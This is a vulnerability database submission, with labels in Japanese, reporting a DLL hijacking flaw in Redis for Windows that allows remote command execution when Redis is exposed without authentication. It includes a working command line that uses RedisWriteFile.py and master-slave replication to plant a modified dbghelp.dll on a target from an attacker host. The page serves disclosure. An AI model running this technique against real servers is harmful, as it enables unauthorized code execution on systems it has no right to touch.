| タイトル | Redis On Windows DLL Hijacking Result in RCE When Unauthorized |
|---|
| 説明 | There is a dll hijacking vulnerability in the Windows version of Redis.
When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis.
Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication.
python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll"
details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| ソース | ⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| ユーザー | J0o1ey (UID 30618) |
|---|
| 送信 | 2022年10月26日 12:05 (4 年 ago) |
|---|
| モデレーション | 2022年10月28日 07:39 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 212416 [Redis 上 Windows dbghelp.dll 特権昇格] |
|---|
| ポイント | 20 |
|---|